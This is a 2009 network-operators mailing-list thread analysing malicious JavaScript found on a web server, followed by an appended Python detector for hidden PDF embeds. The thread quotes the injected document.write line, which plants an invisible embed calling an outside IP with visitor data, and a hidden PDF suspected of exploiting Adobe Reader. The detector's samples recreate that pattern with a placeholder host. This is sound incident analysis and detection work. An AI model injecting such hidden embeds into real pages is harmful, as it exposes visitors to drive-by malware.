nanog mailing list archives

Re: Malicious code just found on web server


From: Chris Mills <securinate () gmail com>
Date: Fri, 17 Apr 2009 18:34:54 -0400

You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster () gmail com> wrote:

On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster () gmail com> wrote:


On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate () gmail com> wrote:

I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed
src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\"
type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0"
style="border:none"></embed>

That PDF is on the site; I haven't looked at it yet, though.


Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.


Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- ferg




--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
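
Added example, not part of the thread or anyone's code in it: a small Python detector for the pattern Chris describes above, an <embed> that is zero- or one-pixel in size and points at a PDF, including embeds that only appear as the string argument of a document.write(). The sample inputs are constructed; the host and path in them are placeholders (an RFC 5737 address), not the ones from the post.

```python
import re
from html import unescape

# Constructed samples modelled on the two embeds quoted in the thread.
# The host/path below are placeholders, not the real ones.
SAMPLE_JS = r'''document.write("<embed src=\"http://203.0.113.10/inc/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");'''
SAMPLE_HTML = ('<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>\n'
               '<embed src="video.swf" width="640" height="480"></embed>')

EMBED_RE = re.compile(r'<embed\b([^>]*)>', re.IGNORECASE)
# name="value", name='value' or name=value
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')
# document.write("...") with a double-quoted literal that may contain \" escapes
DOCWRITE_RE = re.compile(r'document\.write(?:ln)?\(\s*"((?:\\.|[^"\\])*)"\s*\)', re.IGNORECASE)

def unescape_js_string(s):
    """Undo the JS string escapes that matter for the embedded markup."""
    return s.replace('\\"', '"').replace("\\'", "'").replace('\\/', '/')

def parse_attrs(attr_text):
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = unescape(value)
    return attrs

def is_hidden(attrs):
    """Width or height of 0 or 1 px: the element is not meant to be seen."""
    def dim(v):
        try:
            return int(str(v).strip().rstrip('px'))
        except ValueError:
            return None
    w, h = dim(attrs.get('width')), dim(attrs.get('height'))
    return (w is not None and w <= 1) or (h is not None and h <= 1)

def is_pdf(attrs):
    typ = attrs.get('type', '').lower()
    src = attrs.get('src', '').lower().split('?')[0]
    return typ == 'application/pdf' or src.endswith('.pdf')

def find_hidden_pdf_embeds(content):
    """Return the src of every hidden PDF <embed>, in markup or in document.write literals."""
    texts = [content] + [unescape_js_string(m.group(1)) for m in DOCWRITE_RE.finditer(content)]
    hits = []
    for text in texts:
        for m in EMBED_RE.finditer(text):
            attrs = parse_attrs(m.group(1))
            if is_hidden(attrs) and is_pdf(attrs):
                hits.append(attrs.get('src', ''))
    return hits
```

Run over a fetched page body, a non-empty result is a reason to pull the referenced PDF for analysis rather than render it.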